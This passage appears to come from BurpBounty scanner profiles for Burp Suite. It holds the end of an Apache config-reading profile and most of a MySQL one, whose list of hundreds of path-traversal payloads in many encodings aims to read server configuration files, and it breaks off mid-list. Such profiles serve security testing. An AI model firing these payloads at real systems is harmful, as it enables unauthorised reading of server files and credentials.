"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 0,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 1,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Linux-Apache2-conf",
"IssueSeverity": "Medium",
"IssueConfidence": "Certain",
"IssueDetail": "Linux-Apache2-conf: \u003cbr\u003e \u003cgrep\u003e",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [
{
"type": "Payload",
"match": "{FILE}",
"replace": "etc/apache2/apache2.conf",
"regex": "String"
}
],
"VariationAttributes": [],
"InsertionPointType": [
18,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127
],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Linux-mysql-conf.bb | [
{
"ProfileName": "Linux-mysql-conf",
"Name": "",
"Enabled": true,
"Scanner": 1,
"Author": "@Sy3Omda",
"Payloads": [
"true,../{FILE}",
"true,../../{FILE}",
"true,../../../{FILE}",
"true,../../../../{FILE}",
"true,../../../../../{FILE}",
"true,../../../../../../{FILE}",
"true,../../../../../../../{FILE}",
"true,../../../../../../../../{FILE}",
"true,..%2f{FILE}",
"true,..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,..%252f{FILE}",
"true,..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,..\\{FILE}",
"true,..\\..\\{FILE}",
"true,..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..%255c{FILE}",
"true,..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,..%c0%af{FILE}",
"true,..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,..%%32%66{FILE}",
"true,..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,..%%35%63{FILE}",
"true,..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,../{FILE}",
"true,../../{FILE}",
"true,../../../{FILE}",
"true,../../../../{FILE}",
"true,../../../../../{FILE}",
"true,../../../../../../{FILE}",
"true,../../../../../../../{FILE}",
"true,../../../../../../../../{FILE}",
"true,..%2f{FILE}",
"true,..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f{FILE}",
